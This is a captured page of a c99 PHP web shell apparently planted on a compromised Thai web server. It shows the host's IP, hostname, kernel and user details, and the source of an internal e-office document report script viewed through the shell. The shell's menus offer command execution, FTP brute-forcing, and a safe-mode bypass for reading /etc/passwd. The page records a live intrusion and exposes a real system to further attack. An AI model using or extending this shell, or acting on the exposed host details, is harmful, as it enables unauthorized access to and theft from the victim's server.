110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/person/admin/ drwxr-xr-x Free 52.35 GB of 127.8 GB (40.96%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/ drwxr-xr-x
Free 52.35 GB of 127.8 GB (40.96%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: printRepFollowDocPsex.php (6.53 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?
set_time_limit(0);
header('Content-type: application/xls');
header('Content-Disposition: attachment; filename="printRepFollowDocPsex.xls"');
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../link/function.php";
include_once "../link/functionshow.php";
include_once "../class/clsDocType.php";
include_once "../class/clsDocuments.php";
include_once "funct.php";
include_once "../class/clsDepartment.php";
 include_once "../class/clsDocLineConfig.php";
 include_once "../class/clsDocLinePosition.php";
 include_once "../class/clsDocReceiveSend.php";
 include_once "../class/clsPerson.php";
 include_once "../link/keyThai.php";
 include_once "getPrefix.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDt = new doctype($oC);
$oDoc = new Documents($oC);    //
$oDoc2 = new Documents($oC);    //
$oDoc3 = new Documents($oC);    //
$oDP = new Department($oC);
$oDP1 = new Department($oC);
$oDP2 = new Department($oC);
$oDlc = new DocLineConfig($oC);
$oDlc1 = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc3 = new DocLineConfig($oC);
$oDlc4 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp1 = new docLinePosition($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$oPS = new person($oC);
$MaxDocGroup=$oDP->SearchMaxDocGroup();

?>
<html>
<head>
<script language="javascript" src="../source/calendarDateInput.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
</head>
<body>
<table  width="978"  align="center">
<tr><td >
		<form name="ff"  method="post" action="printRepFollowDocPsex.php">
		<table width="99%" align="center">
            <tr> 
              <td height="22" colspan="8"><font   face="MS Sans Serif, Tahoma, sans-serif"><strong>ГТВ§Т№ЎТГµФґµТБЛ№С§КЧНГТЄЎТГ·ХиЎУЛ№ґЗС№бЕйЗаКГзЁ&nbsp;
			   <? $oDP1->SearchByKey($deptId);  $oDP1->GetRecord(); echo "Л№иЗВ§Т№ :: ".$oDP1->deptName;  ?></strong></font></td>
            </tr>
            <tr> 
              <td width="92%" height="22" colspan="8"><font   face="MS Sans Serif, Tahoma, sans-serif"><strong><? echo $GLOBALS["COLLEGENAME"]; ?> 
        
			<? if(th2a($yearDoc) == 0){
					  	echo "ЗС№·ХиґУа№Ф№ЎТГКи§Л№С§КЧНµСй§бµиЗС№·Хи ";  list($day1,$month1,$year1) = split('/',$start);  $s=($year1+543)."-".$month1."-".$day1;   echo abbreDate2($s,'/');						
						echo " ¶Ц§ "; list($day2,$month2,$year2) = split('/',$end);  $e=($year2+543)."-".$month2."-".$day2;   echo abbreDate2($e,'/');						
					}else{
						echo "ЗС№·ХиґУа№Ф№ЎТГКи§Л№С§КЧН»ГРЁУ»Х ".a2th($yearDoc);
					}
			?>
                </strong></font></td>
            </tr>
            <tr> 
              <td height="24" ></td>
            </tr>
			<tr align="center">
            <td align="center" colspan="2">
              <table width="100%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA"  style="border-collapse:collapse">
			  <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>"><td width="6%" align="center"><strong>·Хи</strong></td><td width="15%" align="center"><strong>·ХиЛ№С§КЧН</strong></td><td width="22%" align="center"><strong>аГЧиН§</strong></td><td width="10%" align="center"><strong>З/ґ/» ·Хи<br>Е§·РаєХВ№</strong></td><td width="17%" align="center"><strong>Л№иЗВ§Т№ВиНВ/<br>јЩйГСєјФґЄНєЛЕСЎ</strong></td><td width="10%" align="center"><strong>ЛБТВаЛµШ</strong></td></tr>
			<? 
				if(th2a($yearDoc) == 0){
						list($dd, $mm, $yy) = split('[/]',$start);
						$startT=($yy+543)."-".$mm."-".$dd;
						list($dd, $mm, $yy) = split('[/]',$end);
						$endT=($yy+543)."-".$mm."-".$dd;
				}else{
						$yy = th2a($yearDoc);
						$startT = $yy."-01-01";
						$endT = $yy."-12-31";
				}
				
				$oDoc2->SearchByDrsSendDateDocTypeNoDocSubjectDocNoDeptIdfDeleteDlcIDDlcID2DocGroupDsID3PS($startT,$endT,th2a($DocTypeNoStart),th2a($DocTypeNoEnd),th2a($DocSubject),th2a($DocNo),$deptId,$MaxDocGroup,$pId,$printorder);
				while($oDoc2->GetRecord()){
					$nomainps='0';
					if(($i%2) == 0) 
											  echo "<tr bgcolor=\"#FFFFFF\" height=22 >";
										else
											  echo "<tr bgcolor=\"".$GLOBALS["COLOR_BG_TD_17"]."\">";
										$oDoc3->SearchByKey($oDoc2->DocID);
										$oDoc3->GetRecord();
										
										$oRs3->SearchByDocIDStatus3($oDoc2->DocID);
										$oRs3->GetRecord();
										
										$oRs->SearchByDrsFromDrsIDDrsMainPs($oRs3->DrsID);
										if($oRs->GetRecord()==1){   
											$oPS->SearchByKey($oRs->personId); $oPS->GetRecord(); 
											$showname=GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName;
										}else{
											$showname="<div align=\"center\">-</div>";
											$nomainps=1;
										}
										
			?>	  
			<td width="6%" align="center"><? echo a2th($oDoc3->DocTypeNo); ?></td>
			<td width="15%">&nbsp;<? if($oDoc3->DtID!="15"){ echo $oDoc3->DocNo;  }else{  echo '-'; }?></td>
			<td width="23%">&nbsp;<? echo $oDoc3->DocSubject; ?></td>
			<td width="11%" align="center"><?    if($oDoc3->DocDateCreate!="0000-00-00 00:00:00"){  list($DocD,$DocT) = split(' ',$oDoc3->DocDateCreate); echo abbreDate2($DocD,'/')."<br>".a2th($DocT);} ?></td>
			<td width="16%">&nbsp;<? echo $showname; ?></td>
			<td width="8%">&nbsp;</td></tr>
			<? $i++;  
			} 
		 ?>
			</table>
			</td></tr>
			</table>
	<input type="hidden" name="DocSubject" value="<? echo $DocSubject; ?>" >
	<input type="hidden" name="DocNo" value="<? echo $DocNo; ?>" >
  <input type="hidden" name="start" value="<? echo $start; ?>" >
  <input type="hidden" name="end" value="<? echo $end; ?>" >
  <input type="hidden" name="yearDoc" value="<? echo $yearDoc; ?>" >
  <input type="hidden" name="DocTypeNoStart" value="<? echo $DocTypeNoStart; ?>" >
  <input type="hidden" name="DocTypeNoEnd" value="<? echo $DocTypeNoEnd; ?>" >
<input type="hidden" name="pId" value="<? echo $pId; ?>" >
  <input type="hidden" name="deptId" value="<? echo $deptId; ?>" >
   <input type="hidden" name="print" value="ѕФБѕм" >
				 </form>
		</td>
		</tr>
</table>
</body>
</html>
<script>
function printDetailFollowDocDept(p,q){ 
		FileName = "printRepFollowDocDeptDetail.php?DocID="+p+"&DrsID="+q;
			var w=600;  
			var h=600;
			strOption = "scrollbars=yes,left=300,top=100,width=" + w + ",height=" + h;
			window.open(FileName,"",strOption); 		
}
function showDocex(){
	document.ff.submit();
}
</script>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--